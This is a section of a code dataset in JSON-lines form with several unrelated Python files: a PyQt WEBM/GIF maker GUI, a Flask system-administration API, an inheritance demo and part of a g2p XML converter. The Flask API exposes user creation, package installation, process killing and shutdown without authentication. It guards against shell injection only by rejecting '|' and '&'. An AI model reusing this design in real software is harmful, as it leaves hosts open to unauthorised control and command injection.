self.verticalLayout_4.addWidget(self.fileSizeSlider)\n #===================================================================#\n self.verticalLayout_5.addLayout(self.verticalLayout_3)\n self.verticalLayout_5.addLayout(self.horizontalLayout)\n self.verticalLayout_5.addLayout(self.horizontalLayout_2)\n self.verticalLayout_5.addLayout(self.horizontalLayout_4)\n self.verticalLayout_5.addLayout(self.horizontalLayout_3)\n self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)\n #===================================================================#\n self.verticalLayout_6.addWidget(self.bitRateSlider)\n self.verticalLayout_6.addWidget(self.bitrateLabel)\n #===================================================================#\n self.horizontalLayout.addWidget(self.gifModeCheckBox)\n self.horizontalLayout.addWidget(self.gifModeLabel)\n #===================================================================#\n self.horizontalLayout_2.addWidget(self.startTimeCheckBox)\n self.horizontalLayout_2.addWidget(self.startTimeLabel)\n self.horizontalLayout_2.addWidget(self.timeEdit)\n self.horizontalLayout_2.addItem(spacerItem2)\n #===================================================================#\n self.horizontalLayout_3.addWidget(self.thumbnailModeCheckBox)\n self.horizontalLayout_3.addWidget(self.thumbnailModeLabel)\n self.horizontalLayout_3.addWidget(self.thumbnailDropdown)\n #===================================================================#\n self.horizontalLayout_4.addWidget(self.wadsworthCheckBox)\n self.horizontalLayout_4.addWidget(self.wadsworthLabel)\n #===================================================================#\n self.thumbnailDropdown.setIconSize(QtCore.QSize(16, 16))\n self.thumbnailDropdown.setObjectName(\"thumbnailDropdown\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.setStyleSheet('''\n QComboBox {\n border-style: solid;\n selection-color:black;\n background-color:#f9f9f9;\n border:1px solid black;\n border-radius: 5;\n padding: 1px 0px 1px 10px;\n }\n\n QComboBox::down-arrow {\n width: 14px;\n color:white;\n }\n ''')\n #===================================================================#\n self.horizontalLayout_7.addWidget(self.targetFileSizeCheckBox)\n self.horizontalLayout_7.addWidget(self.targetSizeCheckmarkLabel)\n #===================================================================#\n self.horizontalLayout_8.addWidget(self.audioCheckBox)\n self.horizontalLayout_8.addWidget(self.enableAudioLabel)\n #===================================================================#\n self.bitrateLabel.setEnabled(True)\n self.bitrateLabel.setFont(font)\n self.bitrateLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.bitRateSlider.setStyleSheet(sliderStyleString)\n self.bitRateSlider.setMinimum(1000)\n self.bitRateSlider.setMaximum(15000)\n self.bitRateSlider.setOrientation(QtCore.Qt.Horizontal)\n #===================================================================#\n self.targetFileSizeLabel.setEnabled(True)\n self.targetFileSizeLabel.setFont(font)\n self.targetFileSizeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.fileSizeSlider.setStyleSheet(sliderStyleString)\n self.fileSizeSlider.setMinimum(100)\n self.fileSizeSlider.setMaximum(15000)\n self.fileSizeSlider.setOrientation(QtCore.Qt.Horizontal)\n #===================================================================#\n self.layoutWidget1.setGeometry(QtCore.QRect(10, 40, 401, 221))\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.targetFileSizeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.targetFileSizeCheckBox.setSizePolicy(sizePolicy)\n self.targetFileSizeCheckBox.setText(\"\")\n #===================================================================#\n self.targetSizeCheckmarkLabel.setEnabled(True)\n self.targetSizeCheckmarkLabel.setFont(font)\n self.targetSizeCheckmarkLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.audioCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.audioCheckBox.setSizePolicy(sizePolicy)\n self.audioCheckBox.setText(\"\")\n #===================================================================#\n self.enableAudioLabel.setEnabled(True)\n self.enableAudioLabel.setFont(font)\n self.enableAudioLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.gifModeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.gifModeCheckBox.setSizePolicy(sizePolicy)\n self.gifModeCheckBox.setText(\"\")\n #===================================================================#\n self.gifModeLabel.setEnabled(True)\n self.gifModeLabel.setFont(font)\n self.gifModeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.startTimeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.startTimeCheckBox.setSizePolicy(sizePolicy)\n self.startTimeCheckBox.setText(\"\")\n #===================================================================#\n self.startTimeLabel.setEnabled(True)\n self.startTimeLabel.setFont(font)\n self.startTimeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.timeEdit.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.timeEdit.setSizePolicy(sizePolicy)\n self.timeEdit.setFont(font)\n self.timeEdit.setInputMethodHints(QtCore.Qt.ImhNone)\n self.timeEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2000, 1, 1), QtCore.QTime(0, 0, 0)))\n self.timeEdit.setCurrentSection(QtWidgets.QDateTimeEdit.HourSection)\n self.timeEdit.setCalendarPopup(False)\n self.timeEdit.setTimeSpec(QtCore.Qt.LocalTime)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.thumbnailModeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.thumbnailModeCheckBox.setSizePolicy(sizePolicy)\n self.thumbnailModeCheckBox.setText(\"\")\n #===================================================================#\n self.thumbnailModeLabel.setEnabled(True)\n self.thumbnailModeLabel.setFont(font)\n self.thumbnailModeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.statusLabel.setGeometry(QtCore.QRect(430, 270, 351, 31))\n self.statusLabel.setText(\"\")\n self.statusLabel.setWordWrap(True)\n #===================================================================#\n self.createBtn.setGeometry(QtCore.QRect(10, 260, 123, 61))\n self.createBtn.setFont(font)\n #===================================================================#\n self.startSingleBtn.setGeometry(QtCore.QRect(140, 260, 131, 61))\n self.startSingleBtn.setFont(font)\n #===================================================================#\n self.stopBtn.setGeometry(QtCore.QRect(280, 260, 131, 61))\n self.stopBtn.setFont(font)\n #===================================================================#\n MainWindow.setCentralWidget(self.centralwidget)\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n self.listWidget.itemSelectionChanged.connect(self.setSelected)\n self.listWidget.setAttribute(QtCore.Qt.WA_MacShowFocusRect, 0)\n self.durationSlider.valueChanged.connect(self.editDurationLabel)\n self.sizeSlider.valueChanged.connect(self.editSizeLabel)\n self.numWEBMSlider.valueChanged.connect(self.editNumWEBMLabel)\n self.createBtn.clicked.connect(self.createMedia)\n self.startSingleBtn.clicked.connect(self.createSelectedMedia)\n self.bitRateSlider.valueChanged.connect(self.editBitrateLabel)\n self.audioCheckBox.stateChanged.connect(self.editAudioCheckBox)\n self.gifModeCheckBox.stateChanged.connect(self.enableGifMode)\n self.targetFileSizeCheckBox.stateChanged.connect(self.editTargetFileSizeCheckBox)\n self.fileSizeSlider.valueChanged.connect(self.editTargetFileSizeSliderLabel)\n self.startTimeCheckBox.stateChanged.connect(self.singleMode)\n self.thumbnailModeCheckBox.stateChanged.connect(self.thumbnailMode)\n self.wadsworthCheckBox.stateChanged.connect(self.enableWadsworth)\n self.timeEdit.timeChanged.connect(self.singleMode)\n self.stopBtn.clicked.connect(self.stopProcess)\n self.thumbnailDropdown.currentIndexChanged.connect(self.editThumbnailMode)\n \n self.durationSlider.setSliderPosition(10)\n self.sizeSlider.setSliderPosition(500)\n self.numWEBMSlider.setSliderPosition(5)\n self.bitRateSlider.setSliderPosition(1500)\n self.fileSizeSlider.setSliderPosition(4000)\n self.wadsworthCheckBox.setChecked(True)\n self.populateListLabel()\n self.editDurationLabel()\n self.editSizeLabel()\n self.editNumWEBMLabel()\n self.editBitrateLabel()\n self.editTargetFileSizeSliderLabel()\n \n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"WEBMARIZER\"))\n self.durationLabel.setText(_translate(\"MainWindow\", \"

WEBM Duration:

\"))\n self.sizeLabel.setText(_translate(\"MainWindow\", \"

WEBM Width:

\"))\n self.numWEBMLabel.setText(_translate(\"MainWindow\", \"

Number of WEBMs:

\"))\n \n self.tabWidget.setTabText(self.tabWidget.indexOf(self.generalTab), _translate(\"MainWindow\", \"General Options\"))\n self.bitrateLabel.setText(_translate(\"MainWindow\", \"

Bitrate:

\"))\n self.targetFileSizeLabel.setText(_translate(\"MainWindow\", \"

Target File Size (MB):

\"))\n self.targetSizeCheckmarkLabel.setText(_translate(\"MainWindow\", \"

Enable Target File Size

\"))\n \n self.timeEdit.setDisplayFormat(_translate(\"MainWindow\", \"hh:mm:ss\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.advancedTab), _translate(\"MainWindow\", \"Advanced Options\"))\n self.createBtn.setText(_translate(\"MainWindow\", \"Create WEBM\\n\"\n \"(All videos)\"))\n self.startSingleBtn.setText(_translate(\"MainWindow\", \"Create WEBM \\n\"\n \"(Selected videos)\"))\n self.stopBtn.setText(_translate(\"MainWindow\", \"Stop Process\"))\n self.thumbnailDropdown.setItemText(0, _translate(\"MainWindow\", \"2x2\"))\n self.thumbnailDropdown.setItemText(1, _translate(\"MainWindow\", \"3x3\"))\n self.thumbnailDropdown.setItemText(2, _translate(\"MainWindow\", \"4x4\"))\n self.thumbnailDropdown.setItemText(3, _translate(\"MainWindow\", \"5x5\"))\n self.thumbnailDropdown.setItemText(4, _translate(\"MainWindow\", \"6x6\"))\n if (platform.system() == 'Windows'): # For some reason Mac OSX and Windows font sizes differ? \n self.enableAudioLabel.setText(_translate(\"MainWindow\", \"

Enable Audio

\"))\n self.targetSizeCheckmarkLabel.setText(_translate(\"MainWindow\", \"

Enable Target File Size

\"))\n self.gifModeLabel.setText(_translate(\"MainWindow\", \"

Enable GIF Mode

\"))\n self.thumbnailModeLabel.setText(_translate(\"MainWindow\", \"

Enable THumbnail Mode

\"))\n self.wadsworthLabel.setText(_translate(\"MainWindow\", \"

Enable Wadsworth Constant (Skip first ~30%)

\"))\n self.videoListTitleLabel.setText(_translate(\"MainWindow\", \"

Videos

\"))\n self.startTimeLabel.setText(_translate(\"MainWindow\", \"

Single GIF/WEBM starting at time:

\"))\n else:\n self.enableAudioLabel.setText(_translate(\"MainWindow\", \"

Enable Audio

\"))\n self.targetSizeCheckmarkLabel.setText(_translate(\"MainWindow\", \"

Enable Target File Size

\"))\n self.gifModeLabel.setText(_translate(\"MainWindow\", \"

Enable GIF Mode

\"))\n self.thumbnailModeLabel.setText(_translate(\"MainWindow\", \"

Enable Thumbnail Mode

\"))\n self.wadsworthLabel.setText(_translate(\"MainWindow\", \"

Enable Wadsworth Constant (Skip first ~30%)

\"))\n self.videoListTitleLabel.setText(_translate(\"MainWindow\", \"

Videos

\"))\n self.startTimeLabel.setText(_translate(\"MainWindow\", \"

Single GIF/WEBM starting at time:

\"))\n \n # Determine the video currently selected in the video list\n def setSelected(self):\n global selectedVideo\n selectedVideo = self.listWidget.selectedItems()[0].text()\n \n\n # Attempts to kill WEBM creation process\n def stopProcess(self):\n global FFmpegProcess, stopped\n FFmpegProcess.kill()\n stopped = True\n\n def editThumbnailMode(self):\n global thumbnailNumTilesSide\n if (self.thumbnailDropdown.currentText() == '2x2'):\n thumbnailNumTilesSide = 2\n elif (self.thumbnailDropdown.currentText() == '3x3'):\n thumbnailNumTilesSide = 3\n elif (self.thumbnailDropdown.currentText() == '4x4'):\n thumbnailNumTilesSide = 4\n elif (self.thumbnailDropdown.currentText() == '5x5'):\n thumbnailNumTilesSide = 5\n elif (self.thumbnailDropdown.currentText() == '6x6'):\n thumbnailNumTilesSide = 6\n\n def enableGifMode(self):\n global output_type\n if (self.gifModeCheckBox.isChecked()):\n output_type = 'GIF'\n self.durationLabel.setText(\"GIF Duration: \" + str(self.durationSlider.value()) + \" seconds\")\n self.sizeLabel.setText(\"GIF Width: \" + str(self.sizeSlider.value()) + \" px\")\n self.numWEBMLabel.setText(\"Number of GIFs: \" + str(self.numWEBMSlider.value()))\n else:\n output_type = 'WEBM'\n self.editDurationLabel()\n self.editSizeLabel()\n self.editNumWEBMLabel()\n print(\"Current Mode: \" + output_type)\n\n def enableWadsworth(self):\n global wadsworthConstant\n if (self.wadsworthCheckBox.isChecked()):\n wadsworthConstant = 30\n print(\"Wadsworth constant is enabled. Skipping first 30% of video.\")\n else:\n wadsworthConstant = 0\n print(\"Wadsworth constant is disabled. Starting from beginning of video.\")\n\n\n # If the user specifies a specific start time for GIF/WEBM\n def singleMode(self):\n global single_mode, time_array\n if (self.startTimeCheckBox.isChecked()):\n single_mode = True\n time_array[0] = self.timeEdit.time().hour()\n time_array[1] = self.timeEdit.time().minute()\n time_array[2] = self.timeEdit.time().second()\n self.numWEBMSlider.setEnabled(False)\n self.numWEBMSlider.setSliderPosition(1)\n self.numWEBMLabel.setText(\"Disabled (Single GIF/WEBM mode enabled)\")\n print(\"Selected Time: \" + str(time_array))\n else:\n single_mode = False\n self.numWEBMSlider.setEnabled(True)\n self.enableGifMode() # Return the label back to proper value\n\n def thumbnailMode(self):\n global thumbnailMode\n if (self.thumbnailModeCheckBox.isChecked()):\n thumbnailMode = True\n else:\n thumbnailMode = False\n\n # Sets label to user selected WEBM duration from slider value\n def editDurationLabel(self):\n self.durationLabel.setText(\"WEBM Duration: \" + str(self.durationSlider.value()) + \" seconds\")\n self.editoutputDuration()\n\n # Sets webm duration to corresponding slider value\n def editoutputDuration(self):\n global outputDuration\n outputDuration = self.durationSlider.value()\n if targetSizeSet:\n self.editFileSize()\n\n # Set the bitrate label value\n def editBitrateLabel(self):\n if targetSizeSet:\n self.bitrateLabel.setText(\"Bitrate: \" + str(self.bitRateSlider.value()) + \" kbits/s (Slider disabled)\")\n else:\n self.bitrateLabel.setText(\"Bitrate: \" + str(self.bitRateSlider.value()) + \" kbits/s\")\n self.editBitrate()\n \n # Changes bitrate to corresponding slider value\n def editBitrate(self):\n global bitrate\n bitrate = self.bitRateSlider.value()\n\n # Changes boolean for audio enabled\n def editAudioCheckBox(self):\n global audioEnabled\n audioEnabled = self.audioCheckBox.isChecked()\n\n # Changes value of target file size \n def editTargetFileSizeCheckBox(self):\n global targetSizeSet\n targetSizeSet = self.targetFileSizeCheckBox.isChecked()\n self.editTargetFileSizeSliderLabel()\n self.editBitrateLabel()\n\n # Set the target file size label\n def editTargetFileSizeSliderLabel(self): \n if targetSizeSet:\n self.targetFileSizeLabel.setText(\"Target File Size: \" + str(self.fileSizeSlider.value()/1000) + \" MB\")\n self.editFileSize()\n self.bitRateSlider.setEnabled(False)\n self.fileSizeSlider.setEnabled(True)\n else:\n self.fileSizeSlider.setEnabled(False)\n self.bitRateSlider.setEnabled(True)\n self.targetFileSizeLabel.setText(\"Target File Size: Disabled\")\n\n # Change value of file size to corresponding slider value\n def editFileSize(self):\n global fileSize\n fileSize = self.fileSizeSlider.value()\n video_bitrate = ( ( fileSize * 8 * 1000 ) / outputDuration ) - 96000 #96 kbps audio bitrate\n self.bitRateSlider.setSliderPosition(video_bitrate / 1000)\n\n # Set the WEBM width label text to slider value\n def editSizeLabel(self):\n self.sizeLabel.setText(\"WEBM Width: \" + str(self.sizeSlider.value()) + \" px\")\n self.editSize() \n\n # Set WEBM width variable to corresponding slider value\n def editSize(self):\n global outputWidth\n outputWidth = self.sizeSlider.value()\n\n # Sets WEBM number label text to slider value\n def editNumWEBMLabel(self):\n self.numWEBMLabel.setText(\"Number of WEBMs: \" + str(self.numWEBMSlider.value()))\n self.editNumWEBM()\n\n # Sets number of WEBMs variable to corresponding slider value\n def editNumWEBM(self):\n global numWEBM\n numWEBM = self.numWEBMSlider.value()\n\n # Sets the status label text to current WEBM we're creating\n def setStatusText(self, status):\n #self.statusLabel.setText(status)\n self.statusLabel.setText(status)\n\n # If there's videos in current folder, we show them in the list widget\n def populateListLabel(self):\n videos_array = createVideoList()\n if (len(videos_array) > 0):\n for video in videos_array:\n item = QtWidgets.QListWidgetItem()\n item.setText(video)\n self.listWidget.addItem(item)\n else:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(QtCore.Qt.ItemIsSelectable)\n self.listWidget.addItem(\"No videos found\")\n\n # Starts creating WEBMs from all videos in list\n def createMedia(self):\n init()\n\n # Starts creating WEBMs only from selected video in list\n def createSelectedMedia(self):\n processVideo(selectedVideo)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n GUI = Ui_MainWindow()\n GUI.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n\n","sub_path":"webmarizer.py","file_name":"webmarizer.py","file_ext":"py","file_size_in_byte":50093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"542269557","text":"from LEA import app, resources, users, apiresponse, actions, packages, process\nfrom simplepam import authenticate\nfrom flask import render_template, session, redirect, url_for, escape, request\nfrom jinja2 import TemplateNotFound\nimport json\n\n\nINTERNAL_ERROR = \"500: Internal server error\"\n\napp.config.from_json('settings.json')\n\n\n@app.route('/api/create_user', methods=['POST'])\ndef api_create_user():\n content = request.json\n print(content)\n response = apiresponse.APIResponse()\n if users.create_user(content['username'], content['auth']):\n response.insert_value(\"Status\", \"OK\")\n response.insert_value(\"Message\", \"User \" + content['username'] + \" created\")\n else:\n response.insert_value(\"Error\", \"Couldn't create user\")\n return response.get_json()\n\n\n@app.route(\"/api/delete_user\", methods=[\"POST\"])\ndef api_delete_user():\n content = request.json\n response = apiresponse.APIResponse()\n if users.delete_user(str(content['username']['s']['s'])): # Will return 1 if user hasn't been created\n response.insert_value(\"Status\", \"OK\")\n else:\n response.insert_value(\"Error\", \"Couldn't delete user\")\n return response.get_json()\n\n\n@app.route(\"/api/change_password\", methods=[\"POST\"])\ndef api_change_password():\n content = request.json\n user = content['username']\n new_pass = content['new_password']\n old_pass = content['old_pass']\n # TODO: Implement function in users.py\n response = apiresponse.APIResponse()\n response.insert_value(\"Status\", \"OK\")\n return response.get_json()\n\n\n@app.route('/api/login', methods=['POST'])\ndef login():\n content = request.json\n ip = content['ip']\n password = content['password']\n\n response = apiresponse.APIResponse()\n response.insert_value(\"IP\", str(ip))\n return response.get_json()\n\n\n@app.route(\"/api/ram\")\ndef api_ram():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", resources.get_ram_usage_percent())\n return response.get_json()\n\n\n@app.route(\"/api/users/\")\ndef api_get_user(user):\n return {user: users.get_user_groups(user)}\n\n\n@app.route(\"/api/users\")\ndef get_user_list():\n user_list = users.get_users()\n # return { \"users\" : json.dumps(user_list) }\n return json.dumps(user_list)\n\n\n@app.route(\"/api/process\")\ndef api_process_list():\n return json.dumps(resources.get_process_list())\n\n\n@app.route(\"/api/stop_process\", methods=['POST'])\ndef api_stop_process():\n content = request.json\n response = apiresponse.APIResponse()\n process_name = content[\"name\"][\"s\"]\n if \"|\" in process_name or \"&\" in process_name:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(),400\n\n if process.delete_process(str(process_name)):\n response.insert_value(\"Status\", \"OK\")\n return response.get_json()\n else:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(),400\n\n\n\n@app.route(\"/api/cpu\")\ndef api_get_cpu():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", resources.get_cpu_usage())\n return response.get_json()\n\n\n@app.route(\"/api/package/install\", methods=[\"POST\"])\ndef api_install_package():\n content = request.json\n\n response = apiresponse.APIResponse()\n\n package_name = content[\"name\"]\n pkgManager = packages.PackageManager(\"yum\")\n if \"|\" in package_name or \"&\" in package_name:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(), 400\n\n if pkgManager.install(package_name):\n response.insert_value(\"Status\", \"OK\")\n return response.get_json(), 200\n else:\n response.insert_value(\"Status\", \"Erorr\")\n return response.get_json(), 400\n\n\n@app.route(\"/api/package/delete\", methods=[\"POST\"])\ndef api_delete_package():\n content = request.json\n response = apiresponse.APIResponse()\n\n package_name = content[\"name\"]['s']\n print(package_name)\n pkgManager = packages.PackageManager(\"yum\")\n\n if pkgManager.remove(package_name):\n response.insert_value(\"Status\", \"OK\")\n return response.get_json(), 200\n else:\n response.insert_value(\"Status\", \"Error\")\n return response.get_json(), 400\n\n@app.route(\"/api/package/status\")\ndef api_package_status():\n response = apiresponse.APIResponse()\n if resources.apt_locked() == b'FREE':\n response.insert_value(\"Status\",\"Free\")\n return response.get_json(),200\n else:\n response.insert_value(\"Status\",\"Locked\")\n return response.get_json(),200\n\n\n@app.route(\"/api/battery\")\ndef api_battery():\n response = apiresponse.APIResponse()\n response.insert_value(\"Plug\", resources.get_battery_plugged())\n response.insert_value(\"Value\", resources.get_battery_percentage())\n return response.get_json(), 200\n\n\n@app.route(\"/api/shutdown\")\ndef api_shutdown():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", \"Ok\")\n actions.shutdown()\n return response.get_json(), 200\n\n\n@app.route(\"/api/disk\")\ndef api_disk():\n response = apiresponse.APIResponse()\n response.insert_value(\"Value\", resources.get_disk_space())\n return response.get_json(), 200\n\n@app.route(\"/api/disk_folders\")\ndef api_disk_folders():\n return json.dumps(resources.get_disk_folders()),200\n\n@app.route(\"/api/ram/process\")\ndef api_ram_process():\n return json.dumps(resources.get_process_list_with_usage()),200\n\n@app.route(\"/api/package/list\")\ndef api_package_list():\n return json.dumps(resources.installed_packages()),200\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"LEA/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83739855","text":"class Employee:\n no_of_employee = 10\n\n def __init__(self, name, age, dept):\n self.name = name\n self.age = age\n self.dept = dept\n\n\n @classmethod\n def from_dash(cls, string):\n return cls(*string.split('-'))\n\n @staticmethod\n def validateName(string):\n if string.isalpha():\n return True\n return False\n\n\n def printDetail(self):\n return f\"Hello my name is {self.name}, age is {self.age} and working in {self.dept} department\"\n\n\nclass Player:\n\n def __init__(self, name,age,game):\n self.name = name\n self.age = age\n self.game = game\n self.var1 = \"Player2\"\n\n def printDetail(self):\n return f\"Hello my name is {self.name}, age is {self.age} and playing {self.game} games\"\n\n\nclass CoolProgrammer(Player, Employee):\n var1 = \"Name\"\n\n\nif __name__ == '__main__':\n s1 = Employee.from_dash(\"Ashish-24-PD\")\n s2 = Employee(\"Ankur\", \"24\", \"PD\")\n print(s1.validateName(s1.name))\n s3 = CoolProgrammer(\"Ankur\", \"24\", [\"Cricket\", \"Hockey\", \"Badminton\"])\n print(s3.printDetail())\n print(s3.var1)\n","sub_path":"multipleInheritance.py","file_name":"multipleInheritance.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"88611749","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n###########################################################################\n#\n# convert_xml.py\n#\n# This takes an XML file with xml:lang attributes and text in\n# some orthography, and converts it to use English ARPABET symbols\n# for speech processing. (Provided, of course, that a conversion\n# pipeline for it is available through the G2P library.)\n# This XML file preserves complex markup, even within words\n# (e.g. even if you have morpheme tags within words, it\n# can perform phonological rules across those tags).\n#\n# Language attributes can be added at any level, even below the level of\n# the word. Like say I need to convert \"Patrickƛən\" (my name is Patrick)\n# in Kwak'wala; neither an English nor Kwak'wala pipeline could appropriately\n# convert this word. I can mark that up as:\n#\n# Patrickƛən\n#\n# to send the first part to the English conversion pipeline and the\n# second part to the Kwak'wala pipeline.\n#\n# The only assumption made by this module about the structure of the XML\n# is that it has word tags (using , the convention used by TEI formats.)\n# The reason for this is that the word is the domain over which phonological\n# rules apply, and we particularly need to know it to be able to perform\n# phonological rules at word boundaries. We also only convert text that\n# is part of words (i.e. we don't bother sending whitespace or punctuation\n# through the G2P).\n#\n# So, if the XML file doesn't have word elements, tokenize it and add them.\n#\n# TODO: Document functions\n############################################################################\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport argparse\nimport copy\nimport os\nimport unicodedata as ud\n\nimport text_unidecode\nfrom g2p import make_g2p\nfrom g2p.mappings.langs.utils import is_arpabet\nfrom g2p.transducer import CompositeTransductionGraph, TransductionGraph\n\nfrom readalongs.log import LOGGER\nfrom readalongs.text.lexicon_g2p import getLexiconG2P\nfrom readalongs.text.lexicon_g2p_mappings import __file__ as LEXICON_PATH\nfrom readalongs.text.util import (\n get_lang_attrib,\n load_xml,\n save_xml,\n unicode_normalize_xml,\n)\n\n\ndef convert_word(word: str, lang: str, output_orthography: str, verbose_warnings: bool):\n if lang == \"eng\":\n # Hack to use old English LexiconG2P\n # Note: adding eng_ prefix to vars that are used in both blocks to make mypy\n # happy. Since the two sides of the if and in the same scope, it complains about\n # type checking otherwise.\n assert output_orthography == \"eng-arpabet\"\n eng_tg = False\n eng_converter = getLexiconG2P(\n os.path.join(os.path.dirname(LEXICON_PATH), \"cmu_sphinx.metadata.json\")\n )\n try:\n eng_text, eng_indices = eng_converter.convert(word)\n eng_valid = is_arpabet(eng_text)\n except KeyError as e:\n if verbose_warnings:\n LOGGER.warning(f'Could not g2p \"{word}\" as English: {e.args[0]}')\n eng_text = word\n eng_indices = []\n eng_valid = False\n return eng_converter, eng_tg, eng_text, eng_indices, eng_valid\n else:\n if lang == \"und\":\n # First, we apply unidecode to map characters all all known alphabets in the\n # Unicode standard to their English representation, then we use g2p.\n text_to_g2p = text_unidecode.unidecode(word)\n else:\n text_to_g2p = word\n\n converter = make_g2p(lang, output_orthography)\n tg = converter(text_to_g2p)\n text = tg.output_string.strip()\n indices = tg.edges\n valid = converter.check(tg, shallow=True)\n if not valid and verbose_warnings:\n converter.check(tg, shallow=False, display_warnings=verbose_warnings)\n\n if lang == \"und\":\n # for now, we don't handle indices through unidecode, so overwrite the indices\n # converter returneed by just beginning-end index pairs\n # TODO: instead of this hack, prepend the indices from word to text_to_g2p to\n # indices.\n indices = [(0, 0), (len(word), len(text))]\n tg = None\n\n return converter, tg, text, indices, valid\n\n\ndef convert_words(\n xml,\n word_unit=\"w\",\n output_orthography=\"eng-arpabet\",\n g2p_fallbacks=[],\n verbose_warnings=False,\n):\n all_g2p_valid = True\n for word in xml.xpath(\".//\" + word_unit):\n # if the word was already g2p'd, skip and keep existing ARPABET representation\n if \"ARPABET\" in word.attrib:\n arpabet = word.attrib[\"ARPABET\"]\n if not is_arpabet(arpabet):\n LOGGER.warning(\n f'Pre-g2p\\'d text \"{word.text}\" has invalid ARPABET conversion \"{arpabet}\"'\n )\n all_g2p_valid = False\n continue\n # only convert text within words\n if not word.text:\n continue\n g2p_lang = (\n get_lang_attrib(word) or \"und\"\n ) # default to Undetermined if lang missing\n text_to_g2p = word.text\n converter, tg, g2p_text, indices, valid = convert_word(\n text_to_g2p, g2p_lang, output_orthography, verbose_warnings\n )\n if not valid:\n # This is where we apply the g2p cascade\n for lang in g2p_fallbacks:\n LOGGER.warning(\n f'Could not g2p \"{text_to_g2p}\" as {g2p_lang}. Trying fallback: {lang}.'\n )\n g2p_lang = lang\n converter, tg, g2p_text, indices, valid = convert_word(\n text_to_g2p, g2p_lang, output_orthography, verbose_warnings\n )\n if valid:\n word.attrib[\"effective_g2p_lang\"] = g2p_lang\n break\n else:\n all_g2p_valid = False\n LOGGER.warning(\n f'No valid g2p conversion found for \"{text_to_g2p}\". '\n f\"Check its orthography and language code, \"\n f\"or pick suitable g2p fallback languages.\"\n )\n\n word.attrib[\"ARPABET\"] = g2p_text\n\n return xml, all_g2p_valid\n\n\ndef convert_xml(\n xml,\n word_unit=\"w\",\n output_orthography=\"eng-arpabet\",\n g2p_fallbacks=[],\n verbose_warnings=False,\n):\n xml_copy = copy.deepcopy(xml)\n xml_copy, valid = convert_words(\n xml_copy, word_unit, output_orthography, g2p_fallbacks, verbose_warnings\n )\n return xml_copy, valid\n\n\ndef go(\n input_filename, output_filename, word_unit=\"w\", output_orthography=\"eng-arpabet\"\n):\n xml = load_xml(input_filename)\n converted_xml = convert_xml(xml, word_unit, output_orthography)\n save_xml(output_filename, converted_xml)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Convert XML to another orthography while preserving tags\"\n )\n parser.add_argument(\"input\", type=str, help=\"Input XML\")\n parser.add_argument(\"output\", type=str, help=\"Output XML\")\n parser.add_argument(\n \"--word_unit\",\n type=str,\n default=\"w\",\n help=\"XML element that \" 'represents a word (default: \"w\")',\n )\n parser.add_argument(\n \"--out_orth\",\n type=str,\n default=\"eng-arpabet\",\n help='Output orthography (default: \"eng-arpabet\")',\n )\n args = parser.parse_args()\n go(args.input, args.output, args.word_unit, args.out_orth)\n","sub_path":"readalongs/text/convert_xml.py","file_name":"convert_xml.py","file_ext":"py","file_size_in_byte":7571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306708733","text":"# _*_coding:utf-8 _*_\nfrom 